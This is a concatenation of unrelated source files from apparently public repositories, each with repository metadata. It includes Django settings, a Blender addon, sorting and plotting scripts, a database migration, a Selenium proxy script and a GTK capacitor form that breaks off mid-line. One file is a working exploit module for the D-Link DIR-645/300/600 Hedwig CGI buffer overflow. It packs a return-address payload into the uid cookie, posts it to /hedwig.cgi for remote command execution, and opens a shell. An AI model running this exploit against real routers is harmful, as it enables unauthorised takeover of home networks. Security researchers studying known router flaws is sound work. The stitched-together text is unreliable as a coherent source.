""" Django settings for Jaypur project. Generated by 'django-admin startproject' using Django 2.1.3. For more information on this file, see https://docs.djangoproject.com/en/2.1/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.1/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '_c4#s_+@o6kx5@ej$9+n-1)-_1+0rqscbzrd()25q=f@=e7m34' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'app.apps.AppConfig', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'Jaypur.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')] , 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'Jaypur.wsgi.application' # Database # https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/'
2c5bad20f3963b0a05c987b18b93b70740c5217f
543e4a93fd94a1ebcadb7ba9bd8b1f3afd3a12b8
/maza/modules/exploits/routers/dlink/multi_hedwig_cgi_exec.py
cda6380b6efab9cd5609c5c1aeab67de8cb19247
[ "MIT" ]
permissive
ArturSpirin/maza
e3127f07b90034f08ff294cc4afcad239bb6a6c3
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
refs/heads/master
2020-04-10T16:24:47.245172
2018-12-11T07:13:15
2018-12-11T07:13:15
161,144,181
2
0
null
null
null
null
UTF-8
Python
false
false
2,810
py
import struct from maza.core.exploit import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { "name": "D-Link Hedwig CGI RCE", "description": "Module exploits buffer overflow vulnerablity in D-Link Hedwig CGI component, " "which leads to remote code execution.", "authors": ( "Austin <github.com/realoriginal>", # routersploit module ), "references": ( "http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008", "http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000", "http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt", "https://www.exploit-db.com/exploits/27283/", ), "devices": ( "D-Link DIR-645 Ver. 1.03", "D-Link DIR-300 Ver. 2.14", "D-Link DIR-600", ), } target = OptIP("", "Target IPv4 or IPv6 address") port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target is vulnerable") shell(self, architecture="mipsle", method="echo", location="/tmp", echo_options={"prefix": "\\\\x"}, exec_binary="chmod 777 {0} && {0} && rm {0}") else: print_error("Target is not vulnerable") def execute(self, cmd): cmd = cmd.encode("utf-8") libcbase = 0x2aaf8000 system = 0x000531FF calcsystem = 0x000158C8 callsystem = 0x000159CC shellcode = utils.random_text(973).encode("utf-8") shellcode += struct.pack("<I", libcbase + system) shellcode += utils.random_text(16).encode("utf-8") shellcode += struct.pack("<I", libcbase + callsystem) shellcode += utils.random_text(12).encode("utf-8") shellcode += struct.pack("<I", libcbase + calcsystem) shellcode += utils.random_text(16).encode("utf-8") shellcode += cmd headers = { "Content-Type": "application/x-www-form-urlencoded", "Cookie": b"uid=" + shellcode + b";" } data = { utils.random_text(7): utils.random_text(7) } response = self.http_request( method="POST", path="/hedwig.cgi", headers=headers, data=data, ) if response is None: return "" return response.text[response.text.find("</hedwig>") + len("</hedwig>"):].strip() @mute def check(self): fingerprint = utils.random_text(10) cmd = "echo {}".format(fingerprint) response = self.execute(cmd) if fingerprint in response: return True return False
b84dd9230ccb462252288d436554e4655ed6d463
58a82d4b72e8c83d8c93a3d3639aa65fbdc9fcbd
/BCPrompt/bc_operators.py
a9acc39d4ec5b58e487e2b05b20c2289164e5737
[]
no_license
8Observer8/myblendercontrib
4de9b880da56a909b3da19c732e32557ab48400b
71aa26457c50622cf5646a7aa39fbe11491f3e7b
refs/heads/master
2021-01-15T15:33:13.133667
2015-10-14T15:38:48
2015-10-14T15:38:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,961
py
import bpy from console_python import add_scrollback from .bc_command_dispatch import ( in_scene_commands, in_search_commands, in_sverchok_commands, in_core_dev_commands, in_modeling_tools, in_upgrade_commands, in_bpm_commands, in_fast_ops_commands) history_append = bpy.ops.console.history_append addon_enable = bpy.ops.wm.addon_enable def print_most_useful(): content = '''\ for full verbose descriptor use -man command | description -----------+---------------- tt | tb | turntable / trackball nav. cen | centers 3d cursor cenv | centers 3d cursor, aligns views to it cento | centers to selected endswith! | copy current console line if ends with exclm. x?bpy | search blender python for x x?bs | search blenderscripting.blogspot for x x?py | search python docs for x x?se | search B3D StackExchange x??se | regular StackExchange search vtx, xl | enable or trigger tinyCAD vtx (will download) ico | enables icon addon in texteditor panel (Dev) 123 | use 1 2 3 to select vert, edge, face -img2p | enabled image to plane import addon -or2s | origin to selected. -dist | gives local distance between two selected verts -gist -o x | uploads all open text views as x to anon gist. -debug | dl + enable extended mesh index visualiser. it's awesome. -----------+---------------------------------------------------------- -idxv | enable by shortcut name (user defined) enable <named addon> | package name or folder name v2rdim | sets render dimensions to current strip. fc | fcurrent -> end.frame ''' add_scrollback(content, 'OUTPUT') class TextSyncOps(bpy.types.Operator): bl_idname = "text.text_upsync" bl_label = "Upsyncs Text from disk changes" def execute(self, context): text_block = context.edit_text bpy.ops.text.resolve_conflict(resolution='RELOAD') return{'FINISHED'} class ConsoleDoAction(bpy.types.Operator): bl_label = "ConsoleDoAction" bl_idname = "console.do_action" def execute(self, context): m = bpy.context.space_data.history[-1].body m = m.strip() DONE = {'FINISHED'} if any([ in_scene_commands(context, m), in_search_commands(context, m), in_sverchok_commands(context, m), in_core_dev_commands(context, m), in_modeling_tools(context, m), in_upgrade_commands(context, m), in_bpm_commands(context, m), in_fast_ops_commands(context, m) ]): return DONE elif m == '-ls': print_most_useful() return DONE elif m == 'cl': bpy.ops.console.clear() return DONE return {'FINISHED'} def register(): bpy.utils.register_module(__name__) def unregister(): bpy.utils.unregister_module(__name__)
5d6ded4faf7566b8fb858f56738f9b733236abda
a3776dfa7a4bfd76ff7cb63ddb3f6d70483b89d2
/python/Sort/BubbleSort.py
fe4c0e4f183df93e94e89a9a26fea609cdd7d9a2
[]
no_license
x-jeff/Algorithm_Code
9e3038d9504391e2bd52ddde1230f69953339ab8
b0411bcc7a7ab674ceca73aeb1348d3241370817
refs/heads/master
2023-07-11T19:55:52.401814
2021-08-14T03:46:12
2021-08-14T03:46:12
293,771,649
0
0
null
null
null
null
UTF-8
Python
false
false
321
py
def bubbleSort(arr): for i in range(1, len(arr)): for j in range(0, len(arr)-i): if arr[j] > arr[j+1]: arr[j], arr[j + 1] = arr[j + 1], arr[j] return arr if __name__ == '__main__': testlist = [17, 23, 20, 14, 12, 25, 1, 20, 81, 14, 11, 12] print(bubbleSort(testlist))
ac126a334e5c16ab0f0e7c96bd9e37e9401d058a
d0081f81996635e913b1f267a4586eb0bfd3dcd5
/dataactcore/migrations/versions/001758a1ab82_remove_legal_entity_address_line3_from_.py
a17f33249deb510d2d5a9c4c694595932bedba00
[ "CC0-1.0" ]
permissive
fedspendingtransparency/data-act-broker-backend
71c10a6c7c284c8fa6556ccc0efce798870b059b
b12c73976fd7eb5728eda90e56e053759c733c35
refs/heads/master
2023-09-01T07:41:35.449877
2023-08-29T20:14:45
2023-08-29T20:14:45
57,313,310
55
36
CC0-1.0
2023-09-13T16:40:58
2016-04-28T15:39:36
Python
UTF-8
Python
false
false
994
py
"""Remove legal_entity_address_line3 from DetachedAwardFinancialAssistance Revision ID: 001758a1ab82 Revises: 60830f0881a5 Create Date: 2018-03-09 10:50:38.640532 """ # revision identifiers, used by Alembic. revision = '001758a1ab82' down_revision = '60830f0881a5' branch_labels = None depends_on = None from alembic import op import sqlalchemy as sa def upgrade(engine_name): globals()["upgrade_%s" % engine_name]() def downgrade(engine_name): globals()["downgrade_%s" % engine_name]() def upgrade_data_broker(): ### commands auto generated by Alembic - please adjust! ### op.drop_column('detached_award_financial_assistance', 'legal_entity_address_line3') ### end Alembic commands ### def downgrade_data_broker(): ### commands auto generated by Alembic - please adjust! ### op.add_column('detached_award_financial_assistance', sa.Column('legal_entity_address_line3', sa.TEXT(), autoincrement=False, nullable=True)) ### end Alembic commands ###
367694bf22eedbb89985c70d2368890832e317f2
23d5370d1b4d889aba0c2bfccfe3fcc8bced7bf4
/examples/RLC_example/test/RLC_IO_I_eval_sim.py
7106cd0859cc1a4f13867be28def0f2e4708d138
[ "MIT" ]
permissive
marcosfelt/sysid-neural-structures-fitting
0cd21b4197b52ffe5ef78ac4045a431e202fdb05
80eda427251e8cce1d2a565b5cbca533252315e4
refs/heads/master
2022-12-06T18:45:21.365282
2020-09-03T18:32:16
2020-09-03T18:32:16
292,630,318
0
0
MIT
2020-09-03T17:01:34
2020-09-03T17:01:33
null
UTF-8
Python
false
false
4,273
py
import pandas as pd import numpy as np import torch import matplotlib.pyplot as plt import os import sys sys.path.append(os.path.join("..", "..")) from torchid.iofitter import NeuralIOSimulator from torchid.iomodels import NeuralIOModel from common import metrics if __name__ == '__main__': dataset_type = 'id' #dataset_type = 'val' #model_type = '32step_noise' model_type = '64step_noise' # model_type = '1step_nonoise' # model_type = '1step_noise' plot_input = False COL_T = ['time'] COL_X = ['V_C', 'I_L'] COL_U = ['V_IN'] COL_Y = ['I_L'] dataset_filename = f"RLC_data_{dataset_type}.csv" df_X = pd.read_csv(os.path.join("data", dataset_filename)) time_data = np.array(df_X[COL_T], dtype=np.float32) # y = np.array(df_X[COL_Y], dtype=np.float32) x = np.array(df_X[COL_X], dtype=np.float32) u = np.array(df_X[COL_U], dtype=np.float32) y_var_idx = 1 # 0: voltage 1: current y = np.copy(x[:, [y_var_idx]]) N = np.shape(y)[0] Ts = time_data[1] - time_data[0] n_a = 2 # autoregressive coefficients for y n_b = 2 # autoregressive coefficients for u n_max = np.max((n_a, n_b)) # delay std_noise_V = 1.0 * 10.0 std_noise_I = 1.0 * 1.0 std_noise = np.array([std_noise_V, std_noise_I]) x_noise = np.copy(x) + np.random.randn(*x.shape) * std_noise x_noise = x_noise.astype(np.float32) y_noise = x_noise[:, [y_var_idx]] # Initialize optimization io_model = NeuralIOModel(n_a=n_a, n_b=n_b, n_feat=64) io_solution = NeuralIOSimulator(io_model) model_filename = f"model_IO_I_{model_type}.pkl" io_solution.io_model.load_state_dict(torch.load(os.path.join("models", model_filename))) # In[Validate model] t_val_start = 0 t_val_end = time_data[-1] idx_val_start = int(t_val_start//Ts)#x.shape[0] idx_val_end = int(t_val_end//Ts)#x.shape[0] n_val = idx_val_end - idx_val_start u_val = np.copy(u[idx_val_start:idx_val_end]) y_val = np.copy(y[idx_val_start:idx_val_end]) y_meas_val = np.copy(y_noise[idx_val_start:idx_val_end]) time_val = time_data[idx_val_start:idx_val_end] y_seq = np.zeros(n_a, dtype=np.float32) #np.array(np.flip(y_val[0:n_a].ravel())) u_seq = np.zeros(n_b, dtype=np.float32 ) #np.array(np.flip(u_val[0:n_b].ravel())) # Neglect initial values # y_val = y_val[n_max:, :] # y_meas_val = y_meas_val[n_max:, :] # u_val = u_val[n_max:, :] # time_val = time_val[n_max:, :] y_meas_val_torch = torch.tensor(y_meas_val) with torch.no_grad(): y_seq_torch = torch.tensor(y_seq) u_seq_torch = torch.tensor(u_seq) u_torch = torch.tensor(u_val) y_val_sim_torch = io_solution.f_sim(y_seq_torch, u_seq_torch, u_torch) err_val = y_val_sim_torch - y_meas_val_torch loss_val = torch.mean((err_val)**2) if dataset_type == 'id': t_plot_start = 0.2e-3 else: t_plot_start = 1.0e-3 t_plot_end = t_plot_start + 0.3e-3 idx_plot_start = int(t_plot_start//Ts)#x.shape[0] idx_plot_end = int(t_plot_end//Ts)#x.shape[0] # In[Plot] y_val_sim = np.array(y_val_sim_torch) time_val_us = time_val *1e6 if plot_input: fig, ax = plt.subplots(2,1, sharex=True) else: fig, ax = plt.subplots(1, 1, sharex=True) ax = [ax] ax[0].plot(time_val_us[idx_plot_start:idx_plot_end], y_val[idx_plot_start:idx_plot_end], 'k', label='True') ax[0].plot(time_val_us[idx_plot_start:idx_plot_end], y_val_sim[idx_plot_start:idx_plot_end], 'r--', label='Model simulation') ax[0].legend(loc='upper right') ax[0].grid(True) ax[0].set_xlabel("Time ($\mu$s)") ax[0].set_ylabel("Capacitor voltage $v_C$ (V)") ax[0].set_ylim([-20, 20]) if plot_input: ax[1].plot(time_val_us[idx_plot_start:idx_plot_end], u_val[idx_plot_start:idx_plot_end], 'k', label='Input') #ax[1].legend() ax[1].grid(True) ax[1].set_xlabel("Time ($\mu$s)") ax[1].set_ylabel("Input voltage $v_{in}$ (V)") fig_name = f"RLC_IO_{dataset_type}_{model_type}.pdf" fig.savefig(os.path.join("fig", fig_name), bbox_inches='tight') R_sq = metrics.r_square(y_val, y_val_sim) print(f"R-squared metrics: {R_sq}")
7de38a9ebf121bd2358964fca2221e14ee60c24a
b93446177b6ac10bd27582b1e9647f0adab7d3d4
/pyVoodoo/ir.py
af3c8d637b9a9ac7f6a12bde7d1fe86473914bc8
[ "BSD-3-Clause" ]
permissive
bossiernesto/pyVoodoo
727f2666a656e8af7ed3d2c8ee4a2ea51f7b95f0
7be339ce05c909d0c3c2893ab1eaa2d18f335235
refs/heads/master
2021-04-09T17:16:46.984893
2017-01-31T22:11:29
2017-01-31T22:11:29
34,115,994
1
1
null
null
null
null
UTF-8
Python
false
false
67
py
class Node(tuple): """Base class for AST""" __slots__ = []
2ad5195cb2531f382db1acaca896c6c212992811
e63c1e59b2d1bfb5c03d7bf9178cf3b8302ce551
/uri/uri_python/ad_hoc/p1089.py
5016209f1dd88333f5f3c73bdab477d7dc2336d9
[]
no_license
GabrielEstevam/icpc_contest_training
b8d97184ace8a0e13e1c0bf442baa36c853a6837
012796c2ceb901cf7aa25d44a93614696a7d9c58
refs/heads/master
2020-04-24T06:15:16.826669
2019-10-08T23:13:15
2019-10-08T23:13:15
171,758,893
5
0
null
null
null
null
UTF-8
Python
false
false
366
py
N = int(input()) while N != 0: entry = input().split(" ") picos = 0 aux_a = int(entry[N-2]) aux_b = int(entry[N-1]) for i in range(N): if (aux_b < aux_a and aux_b < int(entry[i])) or (aux_b > aux_a and aux_b > int(entry[i])): picos += 1 aux_a = aux_b aux_b = int(entry[i]) print(picos) N = int(input())
1df8e317fea69f008dc5d5e32315bd51aa0fb43c
5896da906bdcb1315881712a0baa52a706bbeb06
/cursoemvideo/Atividades/exercicios/ex106.py
3ebfa0d823d84edaa4ae159d58714aa44738c3d8
[]
no_license
frederico-prog/python
313b4c11347fb33f67d73dee89f3106f483a2333
6c3d3757944fcbf569e1114838f236a9329358bd
refs/heads/master
2022-12-13T23:26:55.112797
2020-08-21T22:03:26
2020-08-21T22:03:26
272,381,728
3
0
null
null
null
null
UTF-8
Python
false
false
1,125
py
''' FAÇA UM MINI-SISTEMA QUE UTILIZE O INTERECTIVE HELP DO PYTHON. O USUÁRIO VAI DIGITAR O COMANDO E O MANUAL VAI APARECER. QUANDO O USUÁRIO DIGITAR A PALAVRA 'FIM', O PROGRAMA SE ENCERRARÁ. OBS.: USE CORES. ''' from time import sleep c = ( '\033[m', # 0- sem cor '\033[0;30;41m', # 1- cor vermelha '\033[0;30;42m', # 2- cor verde '\033[0;30;43m', # 3- cor amarela '\033[0;30;44m', # 4- cor azul '\033[0;30;45m', # 5- cor roxa '\033[7;30m' # 6- branca ); def ajuda(com): titulo(f'Acessando o manual do comando \'{com}\'', 4) print(c[6], end='') help(comando) print(c[0], end='') sleep(2) def titulo(msg, cor=0): tam = len(msg) + 4 print(c[cor], end='') print('~' * tam) print(f' {msg}') print('~' * tam) print(c[0], end='') sleep(1) # PROGRAMA PRINCIPAL comando = '' while True: titulo('SISTEMA DE AJUDA PyHELP', 2) comando = str(input('Função ou Biblioteca > ')) if comando.upper() == 'FIM': break else: ajuda(comando) print('ATÉ LOGO!', 1)
7a18d7edc350a9159863008804955748ffbeec6f
e262e64415335060868e9f7f73ab8701e3be2f7b
/.history/Test002/数据类型_20201205162718.py
6bec763ca9a2bf6df3696d9f6db0124f17054d85
[]
no_license
Allison001/developer_test
6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63
b8e04b4b248b0c10a35e93128a5323165990052c
refs/heads/master
2023-06-18T08:46:40.202383
2021-07-23T03:31:54
2021-07-23T03:31:54
322,807,303
0
0
null
null
null
null
UTF-8
Python
false
false
208
py
fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # print(fruits.count("apple")) # a = fruits.index("banana",4) # print(a) # fruits.reverse() # print(fruits) fruits.append("daka")
2fd4937da743fc000cbedc14f31385020e365cac
c264153f9188d3af187905d846fa20296a0af85d
/Python/Python3网络爬虫开发实战/《Python3网络爬虫开发实战》随书源代码/proxy/selenium_chrome_auth.py
f9b9e55510c5325125459414bee6a67c7eb3fbed
[]
no_license
IS-OSCAR-YU/ebooks
5cd3c1089a221759793524df647e231a582b19ba
b125204c4fe69b9ca9ff774c7bc166d3cb2a875b
refs/heads/master
2023-05-23T02:46:58.718636
2021-06-16T12:15:13
2021-06-16T12:15:13
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,653
py
from selenium import webdriver from selenium.webdriver.chrome.options import Options import zipfile ip = '127.0.0.1' port = 9743 username = 'foo' password = 'bar' manifest_json = """ { "version": "1.0.0", "manifest_version": 2, "name": "Chrome Proxy", "permissions": [ "proxy", "tabs", "unlimitedStorage", "storage", "<all_urls>", "webRequest", "webRequestBlocking" ], "background": { "scripts": ["background.js"] } } """ background_js = """ var config = { mode: "fixed_servers", rules: { singleProxy: { scheme: "http", host: "%(ip)s", port: %(port)s } } } chrome.proxy.settings.set({value: config, scope: "regular"}, function() {}); function callbackFn(details) { return { authCredentials: { username: "%(username)s", password: "%(password)s" } } } chrome.webRequest.onAuthRequired.addListener( callbackFn, {urls: ["<all_urls>"]}, ['blocking'] ) """ % {'ip': ip, 'port': port, 'username': username, 'password': password} plugin_file = 'proxy_auth_plugin.zip' with zipfile.ZipFile(plugin_file, 'w') as zp: zp.writestr("manifest.json", manifest_json) zp.writestr("background.js", background_js) chrome_options = Options() chrome_options.add_argument("--start-maximized") chrome_options.add_extension(plugin_file) browser = webdriver.Chrome(chrome_options=chrome_options) browser.get('http://httpbin.org/get')
ecf74664f5363c52e4790b600cfe87442802733c
76efd7bde15c764d81b847c2f1d27776e90ec2ed
/imgauth/urls.py
9e3bcaf4c6a05bdd033ed6d3d6fdce1b5c3a4914
[]
no_license
ccsreenidhin/Image-Metadata-Analysis-ELA
e7e961f5d5724397081c9437c78e727577f449fe
4bb24c3047dc59a81867c7c9cdb58bc0fc222358
refs/heads/master
2022-11-07T21:18:51.340625
2018-03-23T17:16:27
2020-06-13T08:02:49
271,966,669
0
0
null
null
null
null
UTF-8
Python
false
false
1,033
py
"""imgauth URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url, include from django.contrib import admin from django.conf import settings from django.conf.urls.static import static urlpatterns = [ url(r'^admin/', admin.site.urls), #url(r'^', include('imgaut.urls')), ]+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
221f6766e94a926edbc76bf1e3da59c333ccd8f6
42631b33be63821744ec85caf6ef49a6b1d189b0
/VSRTorch/Models/video/__init__.py
f1c5cfea0869dbccaa6f876c2c5d088f6f37712f
[ "MIT" ]
permissive
AliceMegatron/VideoSuperResolution
c70e822764b29a01f3a7c035cfc10e3b31b9f6f4
bfcf237ee7e412b688c7f5e094585bbaecffc1d0
refs/heads/master
2020-05-29T15:25:13.840222
2019-05-16T13:00:43
2019-05-16T13:00:43
189,219,950
1
0
MIT
2019-05-29T12:21:53
2019-05-29T12:21:52
null
UTF-8
Python
false
false
240
py
# Copyright (c): Wenyi Tang 2017-2019. # Author: Wenyi Tang # Email: [email protected] # Update Date: 2019/4/3 下午5:10 import logging _logger = logging.getLogger("VSR.VIDEO") _logger.info("@LoSealL. Video related ops, nets...")
101ccd2aec21b66c706af7a581d6bb1035636092
abb614790bdf41c7db9d09dfdea4385f78c2be52
/rtk-RQA/rtk/hardware/__gui/gtk/Capacitor.py
936eb677804a46719f2a7e3d331f370599b11797
[ "BSD-3-Clause" ]
permissive
codacy-badger/rtk
f981bb75aadef6aaeb5a6fa427d0a3a158626a2a
bdb9392164b0b32b0da53f8632cbe6e3be808b12
refs/heads/master
2020-03-19T02:46:10.320241
2017-10-26T20:08:12
2017-10-26T20:08:12
135,659,105
0
0
null
2018-06-01T02:43:23
2018-06-01T02:43:23
null
UTF-8
Python
false
false
39,030
py
#!/usr/bin/env python """ ################################################### Capacitor Package Component Specific Work Book View ################################################### """ # -*- coding: utf-8 -*- # # rtk.hardware.__gui.gtk.Capacitor.py is part of The RTK Project # # All rights reserved. import sys # Import modules for localization support. import gettext import locale # Modules required for the GUI. try: import pygtk pygtk.require('2.0') except ImportError: sys.exit(1) try: import gtk except ImportError: sys.exit(1) try: import gtk.glade except ImportError: sys.exit(1) # Modules required for plotting. import matplotlib # pylint: disable=E0401 from matplotlib.backends.backend_gtk import FigureCanvasGTK as FigureCanvas # pylint: disable=E0401 from matplotlib.figure import Figure # pylint: disable=E0401 # Import other RTK modules. try: import Configuration import gui.gtk.Widgets as Widgets except ImportError: import rtk.Configuration as Configuration import rtk.gui.gtk.Widgets as Widgets __author__ = 'Andrew Rowland' __email__ = '[email protected]' __organization__ = 'ReliaQual Associates, LLC' __copyright__ = 'Copyright 2007 - 2015 Andrew "weibullguy" Rowland' try: locale.setlocale(locale.LC_ALL, Configuration.LOCALE) except locale.Error: locale.setlocale(locale.LC_ALL, '') _ = gettext.gettext matplotlib.use('GTK') class Inputs(gtk.Frame): """ The Work Book view for displaying all the attributes for a capacitor. The attributes of a capacitor Work Book view are: """ dicQuality = {40: ["", "MIL-SPEC", _(u"Lower")], 41: ["", "M", _(u"Non-Established Reliability"), _(u"Lower")], 42: ["", "S", "R", "P", "M", "L", _(u"MIL-C-19978, Non-Established Reliability"), _(u"Lower")], 43: ["", "S", "R", "P", "M", "L", _(u"MIL-C-18312, Non-Established Reliability"), _(u"Lower")], 44: ["", "S", "R", "P", "M", _(u"Lower")], 45: ["", "S", "R", "P", "M", _(u"Lower")], 46: ["", "T", "S", "R", "P", "M", "L", _(u"MIL-C-5, Non-Established Reliability, Dipped"), _(u"MIL-C-5, Non-Established Reliability, Molded"), _(u"Lower")], 47: ["", "MIL-C-10950", _(u"Lower")], 48: ["", "S", "R", "P", "M", "L", _(u"MIL-C-11272, Non-Established Reliability"), _(u"Lower")], 49: ["", "S", "R", "P", "M", "L", _(u"MIL-C-11015, Non-Established Reliability"), _(u"Lower")], 50: ["", "S", "R", "P", "M", _(u"Non-Established Reliability"), _(u"Lower")], 51: ["", "D", "C", "S", "B", "R", "P", "M", "L", _(u"Lower")], 52: ["", "S", "R", "P", "M", "L", _(u"MIL-C-3965, Non-Established Reliability"), _(u"Lower")], 53: ["", "S", "R", "P", "M", _(u"Non-Established Reliability"), _(u"Lower")], 54: ["", "MIL-SPEC", _(u"Lower")], 55: ["", "MIL-SPEC", _(u"Lower")], 56: ["", "MIL-SPEC", _(u"Lower")], 57: ["", "MIL-SPEC", _(u"Lower")], 58: ["", "MIL-SPEC", _(u"Lower")]} dicSpecification = {40: ["", "MIL-C-25 (CP)", "MIL-C-12889 (CA)"], 41: ["", "MIL-C-11693 (CZ/CZR)"], 42: ["", "MIL-C-14157 (CPV)", "MIL-C-19978 (CQ/CQR)"], 43: ["", "MIL-C-18312 (CH)", "MIL-C-39022 (CHR)"], 44: ["", "MIL-C-55514 (CFR)"], 45: ["", "MIL-C-83421 (CRH)"], 46: ["", "MIL-C-5 (CM)", "MIL-C-39001 (CMR)"], 47: ["", "MIL-C-10950 (CB)"], 48: ["", "MIL-C-11272 (CY)", "MIL-C-23269 (CYR)"], 49: ["", "MIL-C-11015 (CK)", "MIL-C-39014 (CKR)"], 50: ["", "MIL-C-20 (CC/CCR)", "MIL-C-55681 (CDR)"], 51: ["", "MIL-C-39003 (CSR)"], 52: ["", "MIL-C-3965 (CL)", "MIL-C-39003 (CLR)"], 53: ["", "MIL-C-39016 (CU and CUR)"], 54: ["", "MIL-C-62 (CE)"], 55: ["", "MIL-C-81 (CV)"], 56: ["", "MIL-C-14409 (PC)"], 57: ["", "MIL-C-92 (CT)"], 58: ["", "MIL-C-23183 (CG)"]} dicSpecSheet = {40: [["", u"85\u00B0C", u"125\u00B0C"], ["", u"85\u00B0C"]], 41: [["", u"85\u00B0C", u"125\u00B0C", u"150\u00B0C"]], 42: [["", u"65\u00B0C", u"85\u00B0C", u"125\u00B0C"], ["", u"65\u00B0C", u"85\u00B0C", u"125\u00B0C", u"170\u00B0C"]], 43: [["", u"85\u00B0C", u"125\u00B0C"], ["", u"85\u00B0C", u"125\u00B0C"]], 44: [["", u"85\u00B0C", u"125\u00B0C"]], 45: [["", u"125\u00B0C"]], 46: [["", u"70\u00B0C", u"85\u00B0C", u"125\u00B0C", u"150\u00B0C"], ["", u"125\u00B0C", u"150\u00B0C"]], 47: [["", u"85\u00B0C", u"150\u00B0C"]], 48: [["", u"125\u00B0C", u"200\u00B0C"], ["", u"125\u00B0C"]], 49: [["", u"85\u00B0C", u"125\u00B0C", u"150\u00B0C"], ["", u"85\u00B0C", u"125\u00B0C"]], 50: [["", u"85\u00B0C", u"125\u00B0C"], ["", u"85\u00B0C"]], 51: [["", _(u"All")]], 52: [["", u"85\u00B0C", u"125\u00B0C", u"175\u00B0C"], ["", u"125\u00B0C"]], 53: [["", u"85\u00B0C", u"105\u00B0C", u"125\u00B0C"]], 54: [["", u"85\u00B0C"]], 55: [["", u"85\u00B0C", u"125\u00B0C"]], 56: [["", u"125\u00B0C", u"150\u00B0C"]], 57: [["", u"85\u00B0C"]], 58: [["", u"85\u00B0C", u"100\u00B0C", u"125\u00B0C"]]} def __init__(self, model): """ Method to create an input frame for the Capacitor data model. :param model: the :py:class:`rtk.hardware.component.capacitor.Capacitor.Model` whose attributes will be displayed. """ gtk.Frame.__init__(self) self.set_shadow_type(gtk.SHADOW_ETCHED_OUT) # Define private dictionary attributes. # Define private list attributes. # Derating points for the derating curve. The list at position 0 is # for severe environments. The list at position 1 is for benign # environments. self._lst_derate_criteria = [[0.6, 0.6, 0.0], [0.9, 0.9, 0.0]] self._lst_count_labels = [_(u"Quality:"), _(u"Specification:")] self._lst_stress_labels = [_(u"Quality:"), _(u"\u03C0<sub>Q</sub> Override:"), _(u"Rated Voltage:"), _(u"Applied DC Voltage:"), _(u"Applied AC Voltage:"), _(u"Capacitance (F):"), _(u"Specification:"), _(u"Temperature Rating:")] self._lst_quality = self.dicQuality[model.subcategory] self._lst_specification = self.dicSpecification[model.subcategory] self._lst_specsheet = self.dicSpecSheet[model.subcategory] self._lst_construction = [] self._lst_handler_id = [] # Define private scalar attributes. self._hardware_model = model self._subcategory = model.subcategory # Define public dictionary attributes. # Define public list attributes. # Define public scalar attributes. self.cmbConfiguration = Widgets.make_combo(simple=True) self.cmbConstruction = Widgets.make_combo(simple=True) self.cmbQuality = Widgets.make_combo(simple=True) self.cmbSpecification = Widgets.make_combo(simple=True) self.cmbSpecSheet = Widgets.make_combo(simple=True) self.txtACVoltApplied = Widgets.make_entry(width=100) self.txtCapacitance = Widgets.make_entry(width=100) self.txtCommercialPiQ = Widgets.make_entry(width=100) self.txtEffResistance = Widgets.make_entry(width=100) self.txtVoltRated = Widgets.make_entry(width=100) self.txtVoltApplied = Widgets.make_entry(width=100) # Subcategory specific attributes. if self._subcategory == 51: # Solid tantalum self._lst_stress_labels.append(_(u"Eff. Series Resistance:")) elif 